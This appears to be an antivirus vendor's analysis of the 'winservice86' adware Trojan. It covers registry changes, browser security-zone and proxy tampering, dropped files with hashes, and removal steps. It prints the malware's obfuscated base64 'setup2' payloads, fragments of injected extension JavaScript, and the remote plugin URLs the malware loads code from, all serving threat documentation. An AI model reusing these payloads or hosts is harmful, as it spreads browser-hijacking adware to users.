[HKCU\Software\winservice86\Plugins\311]
"Version" = "4"
[HKCU\Software\winservice86\Plugins\43]
"Name" = "IEMessaging"
[HKCU\Software\winservice86\Plugins\288]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('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', 'emzzteqsmc'); }"
[HKCU\Software\winservice86\Plugins\44]
"Version" = "6"
[HKCU\Software\winservice86\Plugins]
"NewTabPluginList" = "42,38,46,17,14,78,13,41,44,39,35,43,40,64,2,4,3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\winservice86\Plugins\288]
"Name" = "firstoffer_pricecomp_m"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsl3.tmp\extensionData\,"
[HKCU\Software\winservice86\Plugins\128]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/128.js"
[HKCU\Software\winservice86\Plugins\91]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/91.js"
[HKCU\Software\winservice86\Plugins\221]
"Name" = "icm_downloads_m"
[HKCU\Software\winservice86\Plugins\43]
"Version" = "5"
[HKCU\Software\winservice86\Installer]
"FullVersionForUrl" = "1_35_09_29"
[HKCU\Software\winservice86\Code]
"AppJavaScript" = " /************************************************************************************ This is your Page Code. The appAPI.ready() code block will be executed on every page load. For more information please visit our docs site: http://docs.crossrider.com*************************************************************************************/appAPI.ready(function($) { // Place your code here (you can also define new functions above this scope) // The $ object is the extension's jQuery object // alert(My new Crossrider extension works! The current page is: document.location.href);});"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\winservice86]
"CrAppId" = "64755"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCU\Software\winservice86\Plugins\253]
"Version" = "2"
[HKCU\Software\winservice86\Plugins\64]
"Version" = "3"
[HKCU\Software\winservice86\Plugins\37]
"Name" = "IEBrowserEvents"
[HKCU\Software\winservice86\Plugins\36]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.isBackground=true;appAPI.tabId=BG;appAPI.internal.scope=Consts.SCOPE.BACKGROUND;appAPI.openURL=function(c,b){if(typeof c===undefined){return;}var a;if(typeof c===object){a=c;}else{a={url:c,where:b};}appAPI.internal.message.send({eventName:openURL,eventContent:a});};appAPI.internal.runHelper=function(a){if(typeof a!==string){console.error(appAPI.runHelper - Invalid parameter. Expected string (1st param) but got: (typeof a));return;}appAPI.internal.message.send({eventName:runHelper,eventContent:a});};window.alert=function(a){a=(a===null?null:a);a=(typeof a===undefined?undefined:a);appAPIinternal.alert(a);};appAPI.internal._isMonitorAPISupported_=function(){return(typeof appAPIinternal.supportMonitor!==undefined);};window.open=function(b,a,d,c){appAPI.internal.message.send({eventName:windowOpen,eve "
[HKCU\Software\winservice86\Plugins\193]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/193.js"
[HKCU\Software\winservice86\Plugins\91]
"Name" = "monetizationLoader.js"
[HKCU\Software\winservice86\Plugins\195]
"Name" = "icm_convertmedia_m"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CF AF 19 13 6E D9 43 A2 1F 03 EB 80 2E B4 B6 BE"
[HKCU\Software\InstalledBrowserExtensions\17638]
"64755" = "winservice86"
[HKCU\Software\winservice86\Plugins\269]
"Version" = "1"
[HKLM\SOFTWARE\InstalledBrowserExtensions\17638]
"64755" = "winservice86"
[HKLM\SOFTWARE\winservice86\IE\Profiles]
"S-1-5-21-1844237615-1960408961-1801674531-1003" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\winservice86\Manifest]
"BgVersion" = "1"
[HKCU\Software\winservice86\Plugins]
"PopupPluginList" = "42,38,46,41,44,39,35,43,36,4,14,78,13,64,47,94"
[HKCU\Software\winservice86\Plugins\354]
"Name" = "categories"
[HKCU\Software\winservice86\Plugins\13]
"Name" = "CrossriderAppUtils"
[HKCU\Software\winservice86\Plugins\17]
"Version" = "4"
[HKCU\Software\winservice86\Plugins\262]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/262.js"
[HKCU\Software\winservice86\Plugins\37]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/37.js"
[HKCU\Software\winservice86\Plugins\288]
"URL" = "http://js.newcloudrack.com/plugins/mins/288.js"
[HKCU\Software\winservice86\Plugins\2]
"Name" = "ie8_fix_1"
[HKCU\Software\winservice86\Plugins\42]
"JavaScript" = "var Consts={SCOPE:{BACKGROUND:0,PAGE:1,POPUP:5,OPEN_URL:6}};if(typeof appAPI===undefined){appAPI={};}appAPI.__should_activate_validation__=true;(function(a){if(typeof window==undefined){window={};}if(typeof window.document===undefined){window.document={};document=window.document;}if(typeof window.alert===undefined){window.alert=function(b){var c;if(typeof b===undefined){c=undefined;}else{if(b===null){c=null;}else{c=b.toString();}}if(typeof c===string){a.alert(c);}};alert=window.alert;}})(appAPIinternal);if(typeof console===undefined){window.console={};console=window.console;}if(typeof console.log===undefined){window.console.log=function(a){};console.log=window.console.log;}if(typeof console.info===undefined){window.console.info=function(a){};console.info=window.console.info;}if(typeof console.warn===undefined){window.console.warn=function(a){};console.warn=window.console.warn;}if(typeof console.error===undefined){window.console.error=function(a){};console.error=window.console.error;"
[HKCU\Software\winservice86\Plugins\354]
"URL" = "http://js.newcloudrack.com/plugins/mins/354.js"
[HKCU\Software\winservice86\Plugins\38]
"Version" = "4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\winservice86]
"UninstallString" = "%Program Files%\winservice86\Uninstall.exe /fcp=1"
[HKCU\Software\winservice86\Plugins\262]
"Name" = "pops_5_j_m"
[HKCU\Software\winservice86\Plugins\37]
"Version" = "6"
[HKCU\Software\winservice86\Installer]
"Params" = "{ source_id : 002201, sub_id : 0, uzid : 0"
[HKCU\Software\winservice86\Plugins\275]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MDg2MzcwNGUwNDA1MTExYTM2MDExZjRiNDM0YzRlMTkxMTFlMTM0OTVjNDYwZTFmNDIwMTE3MDMwMDE2MTcwYzBkMDkwZjA1NGIwOTBjMWU1YzFhNTYxYzA4MWIxNjVmNTA0YTRiNWIxODVmNWM0MDUzMDg1NDExNWQwMzBhNTMxZjE4MDE1NzNjMmMzMDNiMzYzZjNmMjMyYzJlMjYyMTJjMmMyMTM4MjkzZjIxMmYyNzJjMjAzYzNiMzMyNTM1M2EzNTQ1MTIwMzE5MTcwZDAxMTQ1ODM1M2MzMDIxMjYyYTNmM2UzODIxMmYzMTJjMzIzOTI5MzMyMjMwMjgyZjNjMmM1MTQ1NzM2NTRlMTkxMTFlMTMwMDI2MWIxNTRlNTY1MTQ3MDIxNzA3MDMxYTQzNDM0MzA2MTY0NDEzMDExYTBhMWMwODA5MDUwMDA5MTc1ZDEwMDYxNDQzMWY1ZTE1MGUwOTAwNDY1YTQwNTQ1ZTEwNTY1YTUyNDUxMTVlMWI0MjA2MDI1YTE5MGExNzRlMzYyNjJmM2UzZTM2MzkzMTNhMzcyYzJiMzMyOTI5MzEyZjJkMzczNjJkMjYzZjM5MzMzYTIzMjcyYzJjNGYxODFjMWMxZjA0MDcwNjRlMmMzNjNhM2UyMzIyMzYzODJhMzczNjNiMjYyZDNjMjEzYTI0MjIzZTM2MzYyNjRlNDA3YjZjNDgxMzFmMDYwZTEwMDIyNTE1NDc1MDQzNDE0NDVjNzMxMQ==', 'siyllqejcs'); }"
[HKCU\Software\winservice86\Plugins\391]
"Name" = "50intext_new_m"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKCU\Software\winservice86\Plugins\200]
"URL" = "http://js.newcloudrack.com/plugins/mins/200.js"
[HKCU\Software\winservice86\Plugins]
"BgPluginList" = "246,42,38,46,41,44,39,35,43,36,4,14,78,64,47,269,93,102,104,128,180,184,193,220,195,221,223,230,242,262,263,273,275,289,91"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\winservice86]
"DisplayVersion" = "1.35.9.29"
[HKCU\Software\winservice86\Plugins\269]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MGY2ZjYzNTExZjFmMWMxMjNhMDIxODQ3NTA1MzU1MDMxYzE2MWY0YTViNGExYTBiNTkwNjExMDMwYzA0MWQxMzBmMDAwMzBhMWMxMTQxMTMxYjA4NDUxMjE0MWYwMTE0MGE1ZjFkMDA0NDE5MDQ1NDFhMGMwYjRkMmIzYTM4M2QzMzM0Mzc0MDQzN2E3ZDQ3MDIwNzAzMWIxYjM3MWQxYzU2NWY0YTUxMWYxZjFjMTIxYzRhNWI0YTA4NDAxOTUzMDY1MTAxNDI1YTE2MTkxZjU5MDMxZjAxMGIxZTVhMGIwZjA3NTgwYTBiMTYwNjA2MTE0YTAzMTY1OTAxMWI1ZDFkMWUxMDU4MzUyYzI1MjUyYzNkMzA1MjU4NmY2MzUxMDcwNzFkMDUwNjFlM2QwMTQ4NDk1NzU5NWU1YjY1MGQ=', 'tejswkhbop'); }"
[HKCU\Software\winservice86\Plugins\180]
"Name" = "bpo_serp_m"
[HKCU\Software\winservice86\Plugins\35]
"Version" = "4"
[HKCU\Software\winservice86\Plugins\46]
"Name" = "IETimers"
[HKCU\Software\winservice86\Plugins\289]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('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', 'vebtstjlta'); }"
[HKCU\Software\winservice86\Plugins\3]
"Version" = "2"
[HKCU\Software\winservice86\Plugins]
"BrowserEventPluginList" = "14,42,41,44,39,38,43,37,64"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION]
"winservice86-bg.exe" = "8000"
[HKCU\Software\winservice86\Plugins]
"AppPluginList" = "246,42,38,46,17,14,78,13,41,44,39,35,43,40,64,2,4,3,7,9,93,102,104,128,180,184,193,220,195,221,223,230,242,262,263,273,275,289,91"
[HKCU\Software\winservice86\Plugins\13]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/13.js"
[HKCU\Software\winservice86\Plugins\7]
"Version" = "2"
The Trojan modifies IE settings for security zones to map all web nodes that bypass the proxy to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all local web nodes with no dots that do not belong to any other zone to the Intranet Zone:
"UNCAsIntranet" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following registry key(s):
[HKCU\Software\winservice86\Plugins\39]
[HKCU\Software\winservice86\Plugins\38]
[HKCU\Software\winservice86\Plugins\195]
[HKCU\Software\winservice86\Plugins\94]
[HKCU\Software\winservice86\Plugins\193]
[HKCU\Software\winservice86\Plugins\35]
[HKCU\Software\winservice86\Plugins\78]
[HKCU\Software\winservice86\Plugins\37]
[HKCU\Software\winservice86\Plugins\36]
[HKCU\Software\winservice86\Plugins\221]
[HKCU\Software\winservice86\Plugins\220]
[HKCU\Software\winservice86\Plugins\223]
[HKCU\Software\winservice86\Plugins\7]
[HKCU\Software\winservice86\Plugins\242]
[HKCU\Software\winservice86\Plugins\4]
[HKCU\Software\winservice86\Plugins\9]
[HKCU\Software\winservice86\Plugins\102]
[HKCU\Software\winservice86\Plugins\104]
[HKCU\Software\winservice86\Plugins\275]
[HKCU\Software\winservice86\Plugins\93]
[HKCU\Software\winservice86\Plugins\273]
[HKCU\Software\winservice86\Plugins\128]
[HKCU\Software\winservice86\Plugins\17]
[HKCU\Software\winservice86\Plugins\14]
[HKCU\Software\winservice86\Plugins\13]
[HKCU\Software\winservice86\Plugins\64]
[HKCU\Software\winservice86\Plugins\44]
[HKCU\Software\winservice86\Plugins\45]
[HKCU\Software\winservice86\Plugins\46]
[HKCU\Software\winservice86\Plugins\47]
[HKCU\Software\winservice86\Plugins\40]
[HKCU\Software\winservice86\Plugins\41]
[HKCU\Software\winservice86\Plugins\42]
[HKCU\Software\winservice86\Plugins\43]
[HKCU\Software\winservice86\Plugins\230]
[HKCU\Software\winservice86\Plugins\2]
[HKCU\Software\winservice86\Plugins\180]
[HKCU\Software\winservice86\Plugins]
[HKCU\Software\winservice86\Plugins\184]
[HKLM\SOFTWARE\Tempo]
[HKCU\Software\winservice86\Plugins\3]
[HKCU\Software\winservice86\Plugins\269]
[HKCU\Software\winservice86\Plugins\246]
[HKCU\Software\winservice86\Plugins\91]
[HKCU\Software\winservice86\Plugins\289]
[HKCU\Software\winservice86\Plugins\263]
[HKCU\Software\winservice86\Plugins\262]
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process 0f606e8f-8393-4f75-a33c-52fa23d9dc61.exe:3000 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D4 6C 4D 87 58 83 77 EF FB 92 B7 FB BE 3A 32 6B"
Dropped PE files
MD5 | File path |
---|---|
03114dadbd9977fc823f95b21fb987e7 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\comh.181995\GoogleCrashHandler.exe |
d858ba2ee718b1db1ced20646e641d08 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\comh.181995\GoogleUpdate.exe |
f98de4108614e4bb81e95e58e36c7000 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\comh.181995\GoogleUpdateBroker.exe |
7e767b342e55eb1dfd74a65d24ea4b70 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\comh.181995\GoogleUpdateOnDemand.exe |
a608387077284a570bb8a063575e3ca3 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\comh.181995\goopdate.dll |
8aa4451ed8a9bc44505c6bab7ab92094 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\comh.181995\goopdateres_en.dll |
4f6d8d7cdeb95bc4d4fa946a3195e657 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\comh.181995\npGoogleUpdate4.dll |
fefef2f226fd6be184bc4a3378b02aaf | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\comh.181995\psmachine.dll |
8d90bb3a36521b50d0e512a781e36871 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\comh.181995\psuser.dll |
03114dadbd9977fc823f95b21fb987e7 | c:\Program Files\globalUpdate\Update\1.3.25.0\GoogleCrashHandler.exe |
d858ba2ee718b1db1ced20646e641d08 | c:\Program Files\globalUpdate\Update\1.3.25.0\GoogleUpdate.exe |
f98de4108614e4bb81e95e58e36c7000 | c:\Program Files\globalUpdate\Update\1.3.25.0\GoogleUpdateBroker.exe |
7e767b342e55eb1dfd74a65d24ea4b70 | c:\Program Files\globalUpdate\Update\1.3.25.0\GoogleUpdateOnDemand.exe |
a608387077284a570bb8a063575e3ca3 | c:\Program Files\globalUpdate\Update\1.3.25.0\goopdate.dll |
8aa4451ed8a9bc44505c6bab7ab92094 | c:\Program Files\globalUpdate\Update\1.3.25.0\goopdateres_en.dll |
4f6d8d7cdeb95bc4d4fa946a3195e657 | c:\Program Files\globalUpdate\Update\1.3.25.0\npGoogleUpdate4.dll |
fefef2f226fd6be184bc4a3378b02aaf | c:\Program Files\globalUpdate\Update\1.3.25.0\psmachine.dll |
8d90bb3a36521b50d0e512a781e36871 | c:\Program Files\globalUpdate\Update\1.3.25.0\psuser.dll |
d858ba2ee718b1db1ced20646e641d08 | c:\Program Files\globalUpdate\Update\GoogleUpdate.exe |
2c523048ebd358d626fb8bd7b1ad571a | c:\Program Files\winservice86\0f606e8f-8393-4f75-a33c-52fa23d9dc61.exe |
5b833b50e9d596b0d3ce325136c0c4fb | c:\Program Files\winservice86\17b03655-7c85-4e93-aec7-7ee27469780e-11.exe |
34b74aa995e73bdd4b9d5060a6855615 | c:\Program Files\winservice86\17b03655-7c85-4e93-aec7-7ee27469780e-2.exe |
e88ccd8a681b1a12eb53483303dc7692 | c:\Program Files\winservice86\17b03655-7c85-4e93-aec7-7ee27469780e-4.exe |
6371f0c089ae8fc66b873ec8bb9dc5d2 | c:\Program Files\winservice86\17b03655-7c85-4e93-aec7-7ee27469780e-5.exe |
ebf09dc278d70dc6d2ab6f0aec4288b1 | c:\Program Files\winservice86\Interop.IWshRuntimeLibrary.dll |
3a77e9571d9f8748fc5abe0c83f6ec80 | c:\Program Files\winservice86\Newtonsoft.Json.dll |
740ff202a16e18783b38287c16c8d5d8 | c:\Program Files\winservice86\SuperSocket.ClientEngine.Common.dll |
ba883ea86ba520ba129a014f280b1c57 | c:\Program Files\winservice86\SuperSocket.ClientEngine.Core.dll |
de9ace1ad7558a73df25f03c445e779b | c:\Program Files\winservice86\SuperSocket.ClientEngine.Protocol.dll |
5c71031021e9b22bd1f2e1696dec7a76 | c:\Program Files\winservice86\Uninstall.exe |
697c4fdb5abb4e3f19c2c22a5e2ae5a0 | c:\Program Files\winservice86\WebSocket4Net.dll |
3b22b7f149c6bcdb89c2c9d0305aa4ba | c:\Program Files\winservice86\f56fe68c-ded6-4656-a272-5100e7b20016.exe |
df7add30d0339c1c12c82d597bf527e8 | c:\Program Files\winservice86\utils.exe |
2a0e8b0b7075ec87e183337da98ada72 | c:\Program Files\winservice86\winservice86-bg.exe |
682b4c256af1c16ab3bb4e4ab48adcbe | c:\Program Files\winservice86\winservice86-bho.dll |
ffc4214f7d095fb806cdb4240ae620f9 | c:\Program Files\winservice86\winservice86-codedownloader.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
GoogleUpdate.exe:1300
GoogleUpdate.exe:1220
GoogleUpdate.exe:1272
GoogleUpdate.exe:3944
GoogleUpdate.exe:476
GoogleUpdate.exe:2032
GoogleUpdate.exe:1936
17b03655-7c85-4e93-aec7-7ee27469780e-2.exe:2600
f56fe68c-ded6-4656-a272-5100e7b20016.exe:356
17b03655-7c85-4e93-aec7-7ee27469780e-11.exe:1676
17b03655-7c85-4e93-aec7-7ee27469780e-4.exe:1936
winservice86-bg.exe:2952
winservice86-codedownloader.exe:2888
winservice86-codedownloader.exe:2796
regsvr32.exe:2472
%original file name%.exe:1332
0f606e8f-8393-4f75-a33c-52fa23d9dc61.exe:3000
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdate.exe (601 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\C3E814D1CB223AFCD58214D14C3B7EAB (220 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\2BF68F4714092295550497DD56F57004 (18 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab6.tmp (54 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll (5441 bytes)
%WinDir%\Tasks\globalUpdateUpdateTaskMachineUA.job (934 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar5.tmp (2712 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\npGoogleUpdate4.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar9.tmp (2712 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\GoogleCrashHandler.exe (601 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\2BF68F4714092295550497DD56F57004 (408 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\8BD11C4A2318EC8E5A82462092971DEA (477 bytes)
%WinDir%\Tasks\globalUpdateUpdateTaskMachineCore.job (930 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015 (408 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab4.tmp (54 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab8.tmp (49 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateBroker.exe (46 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\psuser.dll (673 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\goopdateres_en.dll (26 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\C3E814D1CB223AFCD58214D14C3B7EAB (341 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateOnDemand.exe (46 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateHelper.msi (673 bytes)
%Program Files%\globalUpdate\Update\GoogleUpdate.exe (601 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015 (49 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\8BD11C4A2318EC8E5A82462092971DEA (208 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar7.tmp (2712 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\MSIcdd94.LOG (474 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\psmachine.dll (673 bytes)
%Program Files%\globalUpdate\Update\Download\{84F03351-931D-41A5-A53D-6B5A7A5A2C96}\1.3.25.36\setup.exe (7547 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\1F356F4D07FE8C483E769E4586569404 (113 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\B69D763EB21649DA26F20618312DEE70 (75 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\B69D763EB21649DA26F20618312DEE70 (232 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\1F356F4D07FE8C483E769E4586569404 (228 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\manifest[2].xml (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\275.js (825 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.181995\GoogleUpdateBroker.exe (46 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\246.js (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\7.js (685 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\update[1].json (39 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\2.js (63 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.181995\goopdate.dll (5441 bytes)
%Program Files%\winservice86\b0eae4e3-6b8d-4874-83f1-2ee3fd4e727b.crx (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\184[1].js (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\47.js (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\180.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\17b03655-7c85-4e93-aec7-7ee27469780e-11.dll (45051 bytes)
%Program Files%\winservice86\1293297481.mxaddon (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\13.js (6 bytes)
%Program Files%\winservice86\winservice86-bho.dll (3361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\17.js (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\492954 (1358266 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\223.js (825 bytes)
%Program Files%\winservice86\Newtonsoft.Json.dll (3073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins.json (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Program Files%\winservice86\17b03655-7c85-4e93-aec7-7ee27469780e-2.exe (6841 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\273.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\223[1].js (823 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\200[1].js (887 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\220.js (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\262.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr2.tmp (605555 bytes)
%Program Files%\winservice86\SuperSocket.ClientEngine.Common.dll (23 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\StdUtils.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\246[1].js (769 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\193.js (869 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\273[1].js (903 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\userCode\background.js (429 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\424[1].js (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\4.js (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\289.js (905 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\plugins[1].json (2977 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\InstallerUtils2.dll (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\38.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\220[1].js (19969 bytes)
%Program Files%\winservice86\17b03655-7c85-4e93-aec7-7ee27469780e.xpi (1425 bytes)
%Program Files%\winservice86\SuperSocket.ClientEngine.Protocol.dll (19 bytes)
%Program Files%\winservice86\winservice86-codedownloader.exe (7433 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\128.js (953 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\43.js (4 bytes)
%Program Files%\winservice86\background.html (729 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\184.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\ExecDos.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\37.js (2 bytes)
%Program Files%\winservice86\winservice86.ico (9 bytes)
%Program Files%\winservice86\17b03655-7c85-4e93-aec7-7ee27469780e-4.exe (9098 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\288[1].js (963 bytes)
%WinDir%\Tasks\17b03655-7c85-4e93-aec7-7ee27469780e-11.job (76 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\45.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Program Files%\winservice86\winservice86-bg.exe (3361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\253[1].js (735 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\9.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.181995\npGoogleUpdate4.dll (1281 bytes)
%WinDir%\Tasks\f56fe68c-ded6-4656-a272-5100e7b20016.job (1620 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl3.tmp\extensionData\plugins\40.js (1 bytes)
